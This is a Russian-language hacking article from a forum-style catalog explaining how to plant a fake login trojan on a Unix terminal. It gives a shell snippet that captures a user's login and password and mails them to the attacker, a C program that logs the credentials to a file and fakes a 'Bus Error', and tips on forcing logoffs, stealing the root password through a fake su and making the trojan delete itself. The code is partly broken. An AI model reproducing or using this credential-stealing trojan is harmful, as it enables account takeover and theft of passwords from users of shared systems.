|
|
Каталог статей |
|
Как затроянить Юникс терминал
Несомненно установление трояна в Юнихе - самый прямой путь для получения полного контроля над системой. Базис достаточно прост: можно послать мусор на экран пользователя, засорив всё что только можно, чтобы вынудить его сделать logoff, создавая отдельный счёт. Тогда можно выложить трояна от того терминала или что-нибудь вроде этого, следующий, кто дозвонится сюда поймает троянского коня. Используй форму ложного логина и пиши username/pw entrerred на диск. Так, теперь имеются и другие трояны доступные для твоей записи. Не думай о вирусах, поскальку они не выполняются, если root не управляет ими. В любом случае общий троян был бы шелл скриптом для получения пароля и для дальнейшего его отправления тебе мылом. Теперь, ты можешь заменить код самоудаляющегося трояна с высказыванием типа: echo "login: c" read lgin echo off ( пашет на некоторых системах ) ( если выше нет досттупа...: stty -noecho ) echo "Password:c read pw echo on echo "Login: $lgin - Pword: $pw" | mail you. Лучший путь для использования данной фени, так сможет произойти удаление как часть самоудаляющегося трояна. Быстрая модификация, удаляя "login" и оставляя пароль, кстати походит на SU, не так ли!? Так что таким образом можно получить пароль root. Но нужно хорошо удостовериться в том, что программа удаляет себя. Вашему вниманию я предлогаю типовой троян в С: #include /* Get the necessary defs.. */ main() { char *name[80]; char *pw[20]; FILE *strm; printf("login: "); gets(name); pw = getpass("Password:"); strm = fopen("/WhereEver/Whateverfile","a"); fprintf(strm,"User: (%s), PW [%s] ",name,pw); fclose(strm); /* put some kind of error below... or something... */ printf("Bus Error - Core Dumped "); exit(1); } Эта программа достаёт логин и пароль и добавляет в файл (/wherever/whateverfile ), по возможности создаёт его. Всё! Можешь затроянить все существующие терминалы!:) Кровавых тебе боёв.....
|
Категория: Хакерство | Добавил: Huker-Admin (24.10.2009)
|
Просмотров: 698
| Рейтинг: 0.0/0 |
|
|
Copyright HUKER.ucoz.com © 2024-2012 |
|
|
|